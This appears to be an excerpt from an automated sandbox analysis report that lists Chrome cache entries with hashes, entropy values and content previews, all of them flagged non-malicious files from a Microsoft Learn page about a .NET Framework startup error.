Preview:	<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	downloaded
Size (bytes):	1817143
Entropy (8bit):	5.501007973622959
Encrypted:	false
SSDEEP:	24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:	F57E274AE8E8889C7516D3E53E3EB026
SHA1:	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:	9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/scripts/en-us/index-docs.js
Preview:	"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Chrome Cache Entry: 110

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13339
Entropy (8bit):	7.683569563478597
Encrypted:	false
SSDEEP:	192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
MD5:	512625CF8F40021445D74253DC7C28C0
SHA1:	F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
SHA-256:	1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
SHA-512:	AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1432
Entropy (8bit):	4.986131881931089
Encrypted:	false
SSDEEP:	24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:	6B8763B76F400DC480450FD69072F215
SHA1:	6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:	8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:	false
Preview:	// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	18367
Entropy (8bit):	7.7772261735974215
Encrypted:	false
SSDEEP:	384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
MD5:	240C4CC15D9FD65405BB642AB81BE615
SHA1:	5A66783FE5DD932082F40811AE0769526874BFD3
SHA-256:	030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
SHA-512:	267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 74

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65410)
Category:	dropped
Size (bytes):	195719
Entropy (8bit):	5.430057012529021
Encrypted:	false
SSDEEP:	3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVli2:Wof3G0NSkNzMeO7z/l3lh
MD5:	9445D8D43537540BC89651C93A9C3832
SHA1:	EC3066770D52DB58CB7E44C54C3ABAA40CEB121A
SHA-256:	586D6261C80CBF8CDEC59DE01F1A1D09B32C04E87431E4333A0BF4D8990C2755
SHA-512:	F2BB9BB14C24883499AF2FAD35EE95AF7BF3D9B0431D8072C54C9D5946C751E04D952F5AD5D937F6CBC7C56177FA2091A5A6F33318F2907E9D3628C28E7FFC9C
Malicious:	false
Preview:	/!. 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e\|\|self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]\|\|{},d=(d=e)[l="oneDS"]=d[l]\|\|{},e=f[o]=f[o]\|\|{},p=e.v=e.v\|\|[],l=d[o]=d[o]\|\|{},g=l.v=l.v\|\|[];for(i in(l.o=l.o\|\|[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]\|\|(g[i]="---"),(u[r]=u[r]\|\|[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e\|\|t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	27868
Entropy (8bit):	5.155680085584642
Encrypted:	false
SSDEEP:	768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
MD5:	0A0F2E1CCB8E5F7C38CB11B101A8941F
SHA1:	112F4B7CB3DEDB9D9744CAC000E05DC949E89891
SHA-256:	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
SHA-512:	9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
Malicious:	false
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65410)
Category:	downloaded
Size (bytes):	207935
Entropy (8bit):	5.420780972514107
Encrypted:	false
SSDEEP:	3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
MD5:	3DE400B2682E30C3F33FA4B93116491F
SHA1:	BC48B898DF43BA2178DE28F5A29D977B2204F846
SHA-256:	84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
SHA-512:	D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
Malicious:	false
URL:	https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Preview:	/!. 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e\|\|self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]\|\|{},d=(d=e)[l="oneDS"]=d[l]\|\|{},e=f[o]=f[o]\|\|{},p=e.v=e.v\|\|[],l=d[o]=d[o]\|\|{},g=l.v=l.v\|\|[];for(i in(l.o=l.o\|\|[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]\|\|(g[i]="---"),(u[r]=u[r]\|\|[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e\|\|t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	27868
Entropy (8bit):	5.155680085584642
Encrypted:	false
SSDEEP:	768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
MD5:	0A0F2E1CCB8E5F7C38CB11B101A8941F
SHA1:	112F4B7CB3DEDB9D9744CAC000E05DC949E89891
SHA-256:	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
SHA-512:	9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/banners/index.json
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	1432
Entropy (8bit):	4.986131881931089
Encrypted:	false
SSDEEP:	24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:	6B8763B76F400DC480450FD69072F215
SHA1:	6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:	8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/global/deprecation.js
Preview:	// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	464328
Entropy (8bit):	5.0747157240281755
Encrypted:	false
